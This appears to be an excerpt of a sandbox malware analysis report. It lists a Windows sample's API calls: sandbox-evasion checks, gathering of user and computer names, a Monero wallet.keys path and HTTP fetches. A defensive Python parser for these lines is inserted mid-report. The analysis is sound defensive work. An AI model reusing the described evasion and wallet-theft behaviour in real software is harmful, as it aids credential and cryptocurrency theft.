                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpylstrlen$Sleep
                                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                          • API String ID: 507064821-2791005934
                                          • Opcode ID: d514c10238f277c2d9eb36fcd0c67bdda31fda32d2b3d1966cc3d05fc805f922
                                          • Instruction ID: 3cdbdf0de43e912afe9ebe545b68256d55af534f1f0a94a9174d5e107e36fa0e
                                          • Opcode Fuzzy Hash: d514c10238f277c2d9eb36fcd0c67bdda31fda32d2b3d1966cc3d05fc805f922
                                          • Instruction Fuzzy Hash: C3E155729102049BCB58FBA0DC56AFE73B8AF59300F549568B4077B095EF397B09CB92

                                          Control-flow Graph

                                          control_flow_graph 1301 ea17a0-ea17cd call eaaad0 StrCmpCA 1304 ea17cf-ea17d1 ExitProcess 1301->1304 1305 ea17d7-ea17f1 call eaaad0 1301->1305 1309 ea17f4-ea17f8 1305->1309 1310 ea17fe-ea1811 1309->1310 1311 ea19c2-ea19cd call eaa800 1309->1311 1313 ea199e-ea19bd 1310->1313 1314 ea1817-ea181a 1310->1314 1313->1309 1316 ea1849-ea1858 call eaa820 1314->1316 1317 ea18cf-ea18e0 StrCmpCA 1314->1317 1318 ea198f-ea1999 call eaa820 1314->1318 1319 ea18ad-ea18be StrCmpCA 1314->1319 1320 ea1821-ea1830 call eaa820 1314->1320 1321 ea187f-ea1890 StrCmpCA 1314->1321 1322 ea185d-ea186e StrCmpCA 1314->1322 1323 ea1932-ea1943 StrCmpCA 1314->1323 1324 ea1913-ea1924 StrCmpCA 1314->1324 1325 ea1970-ea1981 StrCmpCA 1314->1325 1326 ea18f1-ea1902 StrCmpCA 1314->1326 1327 ea1951-ea1962 StrCmpCA 1314->1327 1328 ea1835-ea1844 call eaa820 1314->1328 1316->1313 1329 ea18ec 1317->1329 1330 ea18e2-ea18e5 1317->1330 1318->1313 1350 ea18ca 1319->1350 1351 ea18c0-ea18c3 1319->1351 1320->1313 1348 ea189e-ea18a1 1321->1348 1349 ea1892-ea189c 1321->1349 1346 ea187a 1322->1346 1347 ea1870-ea1873 1322->1347 1335 ea194f 1323->1335 1336 ea1945-ea1948 1323->1336 1333 ea1930 1324->1333 1334 ea1926-ea1929 1324->1334 1340 ea198d 1325->1340 1341 ea1983-ea1986 1325->1341 1331 ea190e 1326->1331 1332 ea1904-ea1907 1326->1332 1337 ea196e 1327->1337 1338 ea1964-ea1967 1327->1338 1328->1313 1329->1313 1330->1329 1331->1313 1332->1331 1333->1313 1334->1333 1335->1313 1336->1335 1337->1313 1338->1337 1340->1313 1341->1340 1346->1313 1347->1346 1355 ea18a8 1348->1355 1349->1355 1350->1313 1351->1350 1355->1313
                                          APIs
                                          • StrCmpCA.SHLWAPI(00000000,block), ref: 00EA17C5
                                          • ExitProcess.KERNEL32 ref: 00EA17D1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: block
                                          • API String ID: 621844428-2199623458
                                          • Opcode ID: 65bf40b68995427a3e16a2aaa55a4fc89fb28c7b5282902b93e03feef96c2833
                                          • Instruction ID: b602c2985fddedd208355e270cc5b8f4ce872af566f11e20a886a13bf5a32072
                                          • Opcode Fuzzy Hash: 65bf40b68995427a3e16a2aaa55a4fc89fb28c7b5282902b93e03feef96c2833
                                          • Instruction Fuzzy Hash: 255134B4B04209EBCB14DFA0D955AFF77B5AF89704F10A098E806BB280D775F941CB62

                                          Control-flow Graph

                                          control_flow_graph 1356 ea7500-ea754a GetWindowsDirectoryA 1357 ea754c 1356->1357 1358 ea7553-ea75c7 GetVolumeInformationA call ea8d00 * 3 1356->1358 1357->1358 1365 ea75d8-ea75df 1358->1365 1366 ea75fc-ea7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 ea75e1-ea75fa call ea8d00 1365->1367 1369 ea7628-ea7658 wsprintfA call eaa740 1366->1369 1370 ea7619-ea7626 call eaa740 1366->1370 1367->1365 1377 ea767e-ea768e 1369->1377 1370->1377
                                          APIs
                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00EA7542
                                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EA757F
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EA7603
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00EA760A
                                          • wsprintfA.USER32 ref: 00EA7640
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                          • String ID: :$C$\$
                                          • API String ID: 1544550907-3109660283
                                          • Opcode ID: 4664824caa19dc6db42c1dc6ada0eb3c072c2523f2d84a46a6876055fb27ed8b
                                          • Instruction ID: dd973ed38a338ca556c118bfe1e6ebbda0a89faa76d79725022c1bfde2de4448
                                          • Opcode Fuzzy Hash: 4664824caa19dc6db42c1dc6ada0eb3c072c2523f2d84a46a6876055fb27ed8b
                                          • Instruction Fuzzy Hash: AC4182B1E04248EBDB10DF94DC45BEEBBB8AF4D704F100199F54A7B280DB796A44CBA5
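The "APIs" lists in the function blocks above print WinINet and Win32 constants raw: InternetSetOptionA is called with option 0000001F (INTERNET_OPTION_SECURITY_FLAGS, the 4-byte value itself is not shown), HttpQueryInfoA with 00000013 (HTTP_QUERY_STATUS_CODE), HttpOpenRequestA with flags 00400100 (INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE), InternetReadFile with a 000007CF-byte (1999) buffer, and the "ERROR" retry path sleeps 0000EA60 ms (60 s). The Python script below is an added example, not Joe Sandbox code and not part of the sample: it parses lines in the "Name.MODULE(args), ref: ADDR" format used in these blocks and resolves those constants against their Windows SDK values. The sample input is copied from the blocks above; the chain check at the end (`HTTP_GET_CHAIN`, `has_ordered_chain`) is this example's own heuristic, not a Joe Sandbox signature.

```python
"""Decode the 'APIs' lines of a Joe Sandbox function block into readable calls.

Added example for this report; it is not Joe Sandbox code and not part of the
analysed sample. Constant values come from the Windows SDK headers
(wininet.h, winnt.h); anything not listed stays as the report's raw hex.
"""
import re

# Sample input, copied from the function blocks of this report (constructed test data).
SAMPLE = """
  • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
• InternetOpenA.WININET(00EB0DFE,00000001,00000000,00000000,00000000), ref: 00E962E1
• StrCmpCA.SHLWAPI(?,00BBFCF0), ref: 00E96303
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E96335
• HttpOpenRequestA.WININET(00000000,GET,?,00BBF278,00000000,00000000,00400100,00000000), ref: 00E96385
• InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E963BF
• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E963D1
• HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00E963FD
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E9646D
• InternetCloseHandle.WININET(00000000), ref: 00E964EF
• Sleep.KERNEL32(0000EA60), ref: 00EA5A1B
• ExitProcess.KERNEL32 ref: 00EA17D1
"""

# Line shape: optional bullet, optional "Part of subcall function XXXX:", then
# Name.MODULE, optional "(args)", optional ", ref: ADDR".
LINE_RE = re.compile(
    r"^•?\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)
HEX_TOKEN = re.compile(r"^[0-9A-F]{8}$")  # Joe prints scalar args as 8 hex digits

WININET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}
WININET_SERVICE = {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}
WININET_OPTION = {31: "INTERNET_OPTION_SECURITY_FLAGS"}
HTTP_QUERY = {19: "HTTP_QUERY_STATUS_CODE"}
REQUEST_FLAGS = {  # HttpOpenRequest dwFlags bits
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x80000000: "INTERNET_FLAG_RELOAD",
}

# (API name, zero-based argument index) -> decoder for that argument's value
DECODERS = {
    ("InternetOpenA", 1): lambda v: WININET_OPEN_TYPE.get(v, hex(v)),
    ("InternetConnectA", 5): lambda v: WININET_SERVICE.get(v, hex(v)),
    ("HttpOpenRequestA", 6): lambda v: "|".join(n for b, n in REQUEST_FLAGS.items() if v & b) or hex(v),
    ("InternetSetOptionA", 1): lambda v: WININET_OPTION.get(v, hex(v)),
    ("HttpQueryInfoA", 1): lambda v: HTTP_QUERY.get(v, hex(v)),
    ("InternetReadFile", 2): lambda v: f"{v} bytes",
    ("Sleep", 0): lambda v: f"{v / 1000:g} s",
    ("OpenEventA", 0): lambda v: "EVENT_ALL_ACCESS" if v == 0x1F0003 else hex(v),
}


def decode_arg(api, idx, tok):
    """Resolve one argument token: '?' is unknown, strings stay, known hex constants get names."""
    tok = tok.strip()
    if tok == "?":
        return "<unknown>"
    if not HEX_TOKEN.match(tok):
        return tok  # a string argument such as GET, ERROR or block
    dec = DECODERS.get((api, idx))
    return dec(int(tok, 16)) if dec else tok


def parse_api_line(line):
    """Parse one report line; returns a dict, or None when the line is not an API call."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    api = m.group("api")
    raw = [t.strip() for t in m.group("args").split(",")] if m.group("args") else []
    return {
        "api": api,
        "module": m.group("module"),
        "ref": m.group("ref"),
        "subcall": m.group("sub") is not None,
        "raw_args": raw,
        "args": [decode_arg(api, i, t) for i, t in enumerate(raw)],
    }


def parse_report_apis(text):
    """Parse every API line in a block of report text, skipping all other lines."""
    return [c for c in (parse_api_line(l) for l in text.splitlines()) if c]


def render(call):
    """One-line readable form, e.g. 'Sleep.KERNEL32(60 s) @ 00EA5A1B'."""
    prefix = "(subcall) " if call["subcall"] else ""
    return f"{prefix}{call['api']}.{call['module']}({', '.join(call['args'])}) @ {call['ref'] or '?'}"


# This example's own heuristic: the WinINet GET-and-read sequence seen in the block above.
HTTP_GET_CHAIN = ["InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
                  "HttpSendRequestA", "HttpQueryInfoA", "InternetReadFile"]


def has_ordered_chain(calls, chain):
    """True if every API in `chain` appears, in that order, among the direct (non-subcall) calls."""
    direct = iter(c["api"] for c in calls if not c["subcall"])
    return all(any(api == want for api in direct) for want in chain)


if __name__ == "__main__":
    parsed = parse_report_apis(SAMPLE)
    for call in parsed:
        print(render(call))
    print("WinINet GET chain present:", has_ordered_chain(parsed, HTTP_GET_CHAIN))
```

Feed it a whole report page and it ignores everything that is not an API line, so the decoded listing can be diffed across samples; arguments the report prints as `?` are values Joe Sandbox could not recover and stay marked unknown rather than being guessed.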

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BB1518), ref: 00EA98A1
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BB1770), ref: 00EA98BA
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BB1530), ref: 00EA98D2
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BB1548), ref: 00EA98EA
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BB1560), ref: 00EA9903
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BB8BA8), ref: 00EA991B
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BA5208), ref: 00EA9933
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BA4FE8), ref: 00EA994C
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BB1698), ref: 00EA9964
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BB16E0), ref: 00EA997C
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BB16B0), ref: 00EA9995
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BB16C8), ref: 00EA99AD
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BA5088), ref: 00EA99C5
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BB16F8), ref: 00EA99DE
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00E911D0: ExitProcess.KERNEL32 ref: 00E91211
                                            • Part of subcall function 00E91160: GetSystemInfo.KERNEL32(?), ref: 00E9116A
                                            • Part of subcall function 00E91160: ExitProcess.KERNEL32 ref: 00E9117E
                                            • Part of subcall function 00E91110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E9112B
                                            • Part of subcall function 00E91110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00E91132
                                            • Part of subcall function 00E91110: ExitProcess.KERNEL32 ref: 00E91143
                                            • Part of subcall function 00E91220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E9123E
                                            • Part of subcall function 00E91220: ExitProcess.KERNEL32 ref: 00E91294
                                            • Part of subcall function 00EA6770: GetUserDefaultLangID.KERNEL32 ref: 00EA6774
                                            • Part of subcall function 00E91190: ExitProcess.KERNEL32 ref: 00E911C6
                                            • Part of subcall function 00EA7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E911B7), ref: 00EA7880
                                            • Part of subcall function 00EA7850: RtlAllocateHeap.NTDLL(00000000), ref: 00EA7887
                                            • Part of subcall function 00EA7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EA789F
                                            • Part of subcall function 00EA78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EA7910
                                            • Part of subcall function 00EA78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00EA7917
                                            • Part of subcall function 00EA78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00EA792F
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00BB8BC8,?,00EB110C,?,00000000,?,00EB1110,?,00000000,00EB0AEF), ref: 00EA6ACA
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EA6AE8
                                          • CloseHandle.KERNEL32(00000000), ref: 00EA6AF9
                                          • Sleep.KERNEL32(00001770), ref: 00EA6B04
                                          • CloseHandle.KERNEL32(?,00000000,?,00BB8BC8,?,00EB110C,?,00000000,?,00EB1110,?,00000000,00EB0AEF), ref: 00EA6B1A
                                          • ExitProcess.KERNEL32 ref: 00EA6B22
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                          • String ID:
                                          • API String ID: 2931873225-0
                                          • Opcode ID: e38ced180883412f4f6acc2f53be28ff156329c283335bb013a857bb54cf1f82
                                          • Instruction ID: c6142d548cb9ac4842189c87c3c56b0a252b70bac7832ad1634f8089e2f83190
                                          • Opcode Fuzzy Hash: e38ced180883412f4f6acc2f53be28ff156329c283335bb013a857bb54cf1f82
                                          • Instruction Fuzzy Hash: 24315031A00308AADB08F7F0DC56BEE77B8AF4A340F056528F642BA181DF747901C7A2

                                           Control-flow Graph
                                          APIs
                                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00BB8BC8,?,00EB110C,?,00000000,?,00EB1110,?,00000000,00EB0AEF), ref: 00EA6ACA
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EA6AE8
                                          • CloseHandle.KERNEL32(00000000), ref: 00EA6AF9
                                          • Sleep.KERNEL32(00001770), ref: 00EA6B04
                                          • CloseHandle.KERNEL32(?,00000000,?,00BB8BC8,?,00EB110C,?,00000000,?,00EB1110,?,00000000,00EB0AEF), ref: 00EA6B1A
                                          • ExitProcess.KERNEL32 ref: 00EA6B22
                                          Similarity
                                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                          • String ID:
                                          • API String ID: 941982115-0
                                          • Opcode ID: 50d4fd8ea95c8c9c185e0d5f14048a6cdfd36454b07e1ffeab89234d16d95c23
                                          • Instruction ID: 91207f42df7b97b76a915254b18064a6bfc5777dfac2d9a35d06a67ee543977f
                                          • Opcode Fuzzy Hash: 50d4fd8ea95c8c9c185e0d5f14048a6cdfd36454b07e1ffeab89234d16d95c23
                                          • Instruction Fuzzy Hash: 6CF03A30A40209EEEB20ABA09C06BBE7BB4FF0E701F196514B913BA181DBB56540D665

                                          Control-flow Graph

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E94839
                                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00E94849
                                          Strings
                                          Similarity
                                          • API ID: CrackInternetlstrlen
                                          • String ID: <
                                          • API String ID: 1274457161-4251816714
                                          • Opcode ID: dfe07d02ae855274e975856867e7ba4baa21b620ecd0b84a06b608c23d389119
                                          • Instruction ID: 81497605be7216af69ef292eac075d2af5c5227597289e77910ac13797eae300
                                          • Opcode Fuzzy Hash: dfe07d02ae855274e975856867e7ba4baa21b620ecd0b84a06b608c23d389119
                                          • Instruction Fuzzy Hash: 14212CB1D01209ABDF14DFA4E849ADE7BB5FB45320F108625E955AB2C0EB746A09CB81

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                            • Part of subcall function 00E96280: InternetOpenA.WININET(00EB0DFE,00000001,00000000,00000000,00000000), ref: 00E962E1
                                            • Part of subcall function 00E96280: StrCmpCA.SHLWAPI(?,00BBFCF0), ref: 00E96303
                                            • Part of subcall function 00E96280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E96335
                                            • Part of subcall function 00E96280: HttpOpenRequestA.WININET(00000000,GET,?,00BBF278,00000000,00000000,00400100,00000000), ref: 00E96385
                                            • Part of subcall function 00E96280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E963BF
                                            • Part of subcall function 00E96280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E963D1
                                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EA5228
                                          Strings
                                          Similarity
                                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                          • String ID: ERROR$ERROR
                                          • API String ID: 3287882509-2579291623
                                          • Opcode ID: 45ae09c57e8a6db1d92acde36c0e97ca54017086e273b9a5ce986c7cb5b8c8be
                                          • Instruction ID: 4ee3c4a7a0ec4bf53ad19519b673e027cca24d47fed65ea9ae2e45d07b826242
                                          • Opcode Fuzzy Hash: 45ae09c57e8a6db1d92acde36c0e97ca54017086e273b9a5ce986c7cb5b8c8be
                                          • Instruction Fuzzy Hash: F3113031900208ABCB58FF64DD56AED73B8AF59340F855168F80B6F592EF34BB05CA91

                                           Control-flow Graph
                                          APIs
                                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E9123E
                                          • ExitProcess.KERNEL32 ref: 00E91294
                                          Strings
                                          Similarity
                                          • API ID: ExitGlobalMemoryProcessStatus
                                          • String ID: @
                                          • API String ID: 803317263-2766056989
                                          • Opcode ID: fb65ae3faf6d9938da0049b4d0736efa91e926167600f5d460a9ba8ff53cf616
                                          • Instruction ID: 96727bf4d7128f70a7b40c134a7f134e02397a66745f6caf702f35e85ba04de9
                                          • Opcode Fuzzy Hash: fb65ae3faf6d9938da0049b4d0736efa91e926167600f5d460a9ba8ff53cf616
                                          • Instruction Fuzzy Hash: 090162B0E44308FADF10EBD0CD49B9EB7B8EB04705F209484E706BA1C0D77465419759
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E9112B
                                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00E91132
                                          • ExitProcess.KERNEL32 ref: 00E91143
                                          Similarity
                                          • API ID: Process$AllocCurrentExitNumaVirtual
                                          • String ID:
                                          • API String ID: 1103761159-0
                                          • Opcode ID: 17a2cef60fd5a1fc0ed53ddb1a6334007bbec757022db4b93cb631e6860c614c
                                          • Instruction ID: 623b5c102687a4ea07d4a4a9a9696e89fb8c64ac5c06a895e8a6e3b5b714f037
                                          • Opcode Fuzzy Hash: 17a2cef60fd5a1fc0ed53ddb1a6334007bbec757022db4b93cb631e6860c614c
                                          • Instruction Fuzzy Hash: 89E0E670A46348FFEB206BA19C0FB0976B8AB04B05F105095FB09771C4D6BA26409799
                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00E910B3
                                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00E910F7
                                          Similarity
                                          • API ID: Virtual$AllocFree
                                          • String ID:
                                          • API String ID: 2087232378-0
                                          • Opcode ID: e9c0ccd840ecf18bd96aea16af45c97322eacb679d50bc20c128e13cafa8991b
                                          • Instruction ID: 532d0b9c1008aaf1fa88c96fcf72548273b24eb3874cceb823d223aaec942041
                                          • Opcode Fuzzy Hash: e9c0ccd840ecf18bd96aea16af45c97322eacb679d50bc20c128e13cafa8991b
                                          • Instruction Fuzzy Hash: 49F0E271641208BBEB149AA4AC4AFAFB7E8E709B15F301448F944E7280D572AE40CBA4
                                          APIs
                                            • Part of subcall function 00EA78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EA7910
                                            • Part of subcall function 00EA78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00EA7917
                                            • Part of subcall function 00EA78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00EA792F
                                            • Part of subcall function 00EA7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E911B7), ref: 00EA7880
                                            • Part of subcall function 00EA7850: RtlAllocateHeap.NTDLL(00000000), ref: 00EA7887
                                            • Part of subcall function 00EA7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EA789F
                                          • ExitProcess.KERNEL32 ref: 00E911C6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
